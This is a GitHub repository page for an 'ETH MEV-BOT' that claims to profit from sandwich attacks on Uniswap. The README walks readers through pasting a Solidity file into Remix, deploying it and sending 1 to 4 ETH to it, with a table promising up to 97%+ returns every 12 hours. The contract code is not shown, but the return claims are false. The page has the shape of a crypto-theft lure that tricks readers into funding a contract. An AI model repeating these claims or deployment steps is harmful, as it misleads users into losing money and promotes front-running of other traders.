Skip to content

πŸ€– ETH MEV-BOT for πŸ₯ͺ sandwich attack on Uniswap πŸ¦„: A Maximal Extractable Value (MEV) Solidity Sandwich BOT πŸ€‘ that allows deployers of contract πŸ“„ to take profits πŸ’° from tokens πŸͺ™. A πŸ€– MEV bot is an arbitrage πŸ”€ tool that sniffs πŸ” the Mempool 🌐 for pending transactions ⏳ on decentralized exchanges like Uniswap πŸ¦„. Make money with MevBot

License

Notifications You must be signed in to change notification settings

Connie56888/eth-mev-bot

Β 
Β 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation


πŸ’ŽπŸ€– ETH MEV-BOT πŸ€–πŸ’Ž

An ETH MEV-BOT for performing sandwich attacks on Uniswap. A Maximal Extractable Value (MEV) Solidity Sandwich BOT that empowers contract deployers to reap profits from tokens.


πŸ“š About

In the fascinating world of cryptocurrency, understanding what an MEV Bot is, can be crucial. A Maximal Extractable Value (MEV) bot is a sophisticated arbitrage instrument that scouts the Mempool for pending transactions on decentralized exchanges such as Uniswap. It cunningly inserts our transaction with a slightly higher gas fee (1 Gwei more than the transaction attempting to enter), thus sandwiching the pending transaction and ensuring ours is processed first, reaping profits from the slippage differences.


πŸš€ How it Works

Our Bot performs the following steps faster than other bots:

  1. Sends the transaction.
  2. Sniffs the Uniswap v2 Mempool.
  3. Competes to buy up the token onchain as quickly as possible, sandwiching the victim's transaction and creating a profitable slippage opportunity.
  4. Sends back the ETH to the contract, ready for withdrawal.

bot-example


ETH Investment Returns

Your Ethereum (ETH) investment returns are calculated on a 12-hour basis as follows:

ETH Range (invested) Returns (12 hours)
1.2ETH - 2.4ETH up to 10%
2.4ETH - 5ETH up to 20%
5ETH - 10ETH 20-27%
10ETH - 20ETH 27-35%
20ETH - 50ETH 35-50%
50ETH - 100ETH 50-63%
100ETH - 200ETH 63-76%
200ETH - 500ETH 76-97%
500ETH and above 97%+

πŸ‘¨β€πŸ’» Instructions

1) Follow these instructions to deploy your smart contract using REMIX IDE

  • πŸ“ Create a new file eth-mevbot.sol and paste the code from eth-mevbot.sol.

1

2) πŸ”§ Select compiler version 0.8.7 and press compile.

2

3) πŸš€ Navigate to "Deploy" and set the environment to "Injected Web3 or Injected Provider". Connect the wallet and click "Deploy".

3

4) Copy the bot's contract and send between 1 and 4 Ethereum to its balance in order for the bot to start.

4

5) Start the bot with the start button.

5

6) Wait atleast 12 hours for profits to roll in. Withdraw anytime by clicking "Withdrawl"

πŸ“Š Remember, for successful transactions on the Ethereum network, you must have enough balance to cover the gas. Recommended 1.2 Ε΀Η and higher.

At any point, you can stop the bot or retrieve your money by calling the withdrawal function.


Please ⭐ the repo to support my project

star


πŸ’°πŸ’°πŸ’° Make money with MevBot πŸ’°πŸ’°πŸ’°


About

πŸ€– ETH MEV-BOT for πŸ₯ͺ sandwich attack on Uniswap πŸ¦„: A Maximal Extractable Value (MEV) Solidity Sandwich BOT πŸ€‘ that allows deployers of contract πŸ“„ to take profits πŸ’° from tokens πŸͺ™. A πŸ€– MEV bot is an arbitrage πŸ”€ tool that sniffs πŸ” the Mempool 🌐 for pending transactions ⏳ on decentralized exchanges like Uniswap πŸ¦„. Make money with MevBot

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Solidity 100.0%